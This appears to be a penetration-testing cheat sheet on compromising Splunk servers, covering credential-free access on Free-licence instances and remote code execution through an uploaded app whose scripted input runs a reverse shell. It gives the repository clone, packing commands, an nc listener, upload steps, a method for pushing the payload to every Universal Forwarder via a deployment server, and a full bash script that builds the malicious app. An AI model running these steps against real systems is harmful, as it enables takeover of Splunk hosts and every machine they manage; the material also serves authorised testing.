Splunk

Port 8000 (Splunk Web UI) and 8089 (splunkd management port / REST API, fingerprinted by nmap as "Splunkd httpd")

Enumeration

A Splunk Enterprise trial reverts to the Free licence after 60 days, and Splunk Free does not support authentication: anyone who can reach the web interface has full admin access with no credentials. The quick check is to browse to port 8000; if you land in the Search app without a login prompt, the instance is running Free.

Exploitation

Code Execution

Splunk can execute code in several places: server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. The most common route to remote code execution on a Splunk server is a scripted input. Scripted inputs exist to integrate Splunk with data sources such as APIs or file servers that need a custom collection method: Splunk runs the script on a schedule and ingests its STDOUT as events. Any script dropped into an app's bin directory and referenced from inputs.conf is therefore executed by splunkd, under whatever account splunkd runs as.

  1. Clone the app template, set the attacker IP and port in the scripts, and pack the app into the tar.gz that Splunk expects

$ git clone https://github.com/0xjpuff/reverse_shell_splunk
$ cd reverse_shell_splunk
$ # edit rev.py (Linux target) and rev.ps1 (Windows target) inside the bin folder
$ tar -cvzf updater.tar.gz reverse_shell_splunk/

  2. Start a listener on the port configured in the script

$ sudo nc -lnvp 443

  3. Login -> Apps -> Manage Apps -> Install app from file, upload updater.tar.gz

Note: which script fires depends on the target platform; against Linux the Python script rev.py is the one that runs, so that is the one that must carry the right IP/port.

If the compromised Splunk host is also a deployment server, the same trick gives RCE on every host running a Universal Forwarder it manages. Place the app under $SPLUNK_HOME/etc/deployment-apps on the compromised host and map it to a server class in serverclass.conf so it is pushed out to the forwarders. In a Windows-heavy environment the app must carry a PowerShell (or batch) reverse shell, because the Universal Forwarder ships without the Python runtime bundled with the full Splunk server.
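As an added example (this is not the page's code nor the 0xjpuff repository), the script below builds a scripted-input app from scratch so the inputs.conf stanza that makes splunkd run the script is visible; the same directory layout is what goes under deployment-apps on a deployment server. The app name updater, the 10-second interval and the proof-of-execution payload in run.sh are assumptions.

```bash
#!/usr/bin/env bash
# Build a minimal Splunk app whose scripted input runs ./bin/run.sh every 10 seconds.
# Added example: layout and stanza follow Splunk's documented scripted-input format;
# the app name, interval and script body are assumptions for illustration.
set -eu

build_app() {
    local app="$1"   # app directory name, also what Splunk Web lists under Apps
    local out="$2"   # output archive, e.g. updater.tar.gz
    local workdir
    case "$out" in /*) ;; *) out="$PWD/$out" ;; esac   # tar -C changes dir, so make it absolute
    workdir="$(mktemp -d)"

    mkdir -p "$workdir/$app/bin" "$workdir/$app/default"

    # Scripted-input stanza: the path is relative to the app directory, so ./bin/run.sh
    # resolves to $SPLUNK_HOME/etc/apps/<app>/bin/run.sh once installed.
    cat > "$workdir/$app/default/inputs.conf" <<'EOF'
[script://./bin/run.sh]
disabled = 0
interval = 10
sourcetype = shell
index = main
EOF

    # The script splunkd executes; its STDOUT is indexed as events, so this
    # proof-of-execution payload shows up in Search and reveals the service account.
    # Replace it with the reverse shell once execution is confirmed.
    cat > "$workdir/$app/bin/run.sh" <<'EOF'
#!/bin/sh
printf 'user=%s host=%s\n' "$(id -un)" "$(hostname)"
EOF
    chmod +x "$workdir/$app/bin/run.sh"

    # "Install app from file" accepts .tar.gz / .tgz / .spl archives.
    tar -C "$workdir" -czf "$out" "$app"
    rm -rf "$workdir"
    echo "$out"
}

# List the archive so the layout can be checked before uploading.
list_app() {
    tar -tzf "$1" | sort
}

build_app updater updater.tar.gz
list_app updater.tar.gz
```

Upload the archive through Install app from file; within one interval the script's output appears as events (search `index=main sourcetype=shell`) and tells you which account splunkd runs under, i.e. whether the shell you get back will be root/SYSTEM or an unprivileged splunk user. For the deployment-server case, unpack the same directory into $SPLUNK_HOME/etc/deployment-apps instead of installing it, and remember that anything destined for Universal Forwarders cannot rely on Python being present.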
